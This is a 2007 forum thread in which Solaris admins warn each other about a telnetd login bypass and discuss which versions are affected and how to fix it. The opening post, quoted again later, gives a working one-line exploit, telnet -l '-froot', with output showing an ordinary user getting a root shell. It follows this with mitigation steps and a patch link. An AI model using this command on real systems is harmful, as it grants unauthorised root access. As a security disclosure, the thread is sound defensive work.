The UNIX and Linux Forums  

Go Back   The UNIX and Linux Forums > OS Specific Forums > SUN Solaris
telnetd bug! telnetd bug!
Google UNIX.COM
Forums Portal Register Rules & FAQContribute Members List Arcade Search Today's Posts Mark Forums Read


SUN Solaris The Solaris Operating System, usually known simply as Solaris, is a free Unix-based operating system introduced by Sun Microsystems .

More UNIX and Linux Forum Topics You Might Find Helpful
Thread Thread Starter Forum Replies Last Post
Can't start telnetd ONEX SUN Solaris 4 02-15-2007 06:33 AM
telnetd vs telnetd -a davidl9999 Security 0 07-21-2006 11:50 AM
in.telnetd[5115] -- compromised? LowOrderBit IP Networking 1 09-19-2001 06:42 PM
Linux and in.telnetd problems sam_pointer UNIX for Dummies Questions & Answers 3 08-31-2001 05:27 AM

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 02-14-2007
pressy's Avatar
solaris cultist
  

Join Date: Aug 2003
Location: Vienna / Austria (Europe) [EARTH]
Posts: 710
Exclamation telnetd bug!
hi mates,

a very important info for all solaris admins, there is a bug in telnetd on nearly every solaris version:

Code:
pressy@mp-wst01 # id
uid=100(pressy) gid=1(other)
pressy@mp-wst01 #  telnet -l "-froot" 192.168.40.1
Trying 192.168.40.1...
Connected to 192.168.40.1.
Escape character is '^]'.
Last login: Wed Feb 14 10:12:45 from 192.168.40.111
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
Sourcing //.profile-EIS.....
Sourcing //.profile-pressy.....
DISPLAY=192.168.40.111:0.0
root@vcsnode1 # id
uid=0(root) gid=0(root)
root@vcsnode1 # uname -a
SunOS vcsnode1 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-4
root@vcsnode1 # head -1 /etc/release
                       Solaris 10 11/06 s10s_u3wos_10 SPARC
more info:
http://seclists.org/fulldisclosure/2007/Feb/0251.html

there is no patch, so you need to disable the telnetd:

solaris <10 = uncomment the telnet line in /etc/inetd.conf and "pkill -HUP inetd"
solaris >10 = "inetadm -d svc:/network/telnet:default"

be sure to enable another login like ssh!
i've tried it on several maschines and it works! so hurry up!

regards pressy
Reply With Quote
Forum Sponsor
  #2 (permalink)  
Old 02-14-2007
pressy's Avatar
solaris cultist
  

Join Date: Aug 2003
Location: Vienna / Austria (Europe) [EARTH]
Posts: 710
it's fixed, some hours later, there is already a patch from sun:

http://sunsolve.sun.com/search/docum...=1-26-102802-1

regards pressy
Reply With Quote
  #3 (permalink)  
Old 02-14-2007
Registered User
  

Join Date: Jul 2005
Location: Chicago, IL
Posts: 86
Quote:
Originally Posted by pressy
hi mates,

a very important info for all solaris admins, there is a bug in telnetd on nearly every solaris version:

Code:
pressy@mp-wst01 # id
uid=100(pressy) gid=1(other)
pressy@mp-wst01 #  telnet -l "-froot" 192.168.40.1
Trying 192.168.40.1...
Connected to 192.168.40.1.
Escape character is '^]'.
Last login: Wed Feb 14 10:12:45 from 192.168.40.111
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
Sourcing //.profile-EIS.....
Sourcing //.profile-pressy.....
DISPLAY=192.168.40.111:0.0
root@vcsnode1 # id
uid=0(root) gid=0(root)
root@vcsnode1 # uname -a
SunOS vcsnode1 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-4
root@vcsnode1 # head -1 /etc/release
                       Solaris 10 11/06 s10s_u3wos_10 SPARC
more info:
http://seclists.org/fulldisclosure/2007/Feb/0251.html

there is no patch, so you need to disable the telnetd:

solaris <10 = uncomment the telnet line in /etc/inetd.conf and "pkill -HUP inetd"
solaris >10 = "inetadm -d svc:/network/telnet:default"

be sure to enable another login like ssh!
i've tried it on several maschines and it works! so hurry up!

regards pressy
This only relates to solaris 10.
Reply With Quote
  #4 (permalink)  
Old 02-14-2007
andryk's Avatar
Registered User
  

Join Date: Sep 2003
Posts: 448
Quote:
This only relates to solaris 10.
I beleive so too, all the solaris 8 and 9 box I tested seem to be not vulnerable ... Many thankx for the info anyway (I used to be a great fan reader of bugtraq )
Reply With Quote
Google UNIX.COM
Reply

« Patch for OS5.9 118558-10 | Can't start telnetd »
Thread Tools
Display Modes
Linear Mode Linear Mode




All times are GMT -7. The time now is 07:45 PM.

The UNIX and Linux Forums RSS Feeds - Contact Us - The UNIX and Linux Forums - Archive - Top

Powered by: vBulletin, Copyright ©2000 - 2006, Jelsoft Enterprises Limited.
The UNIX and Linux Forums Content Copyright ©1993-2008 The CEP Blog All Rights Reserved -Ad Management by RedTyger Visit The Global Fact Book

Content Relevant URLs by vBSEO 3.2.0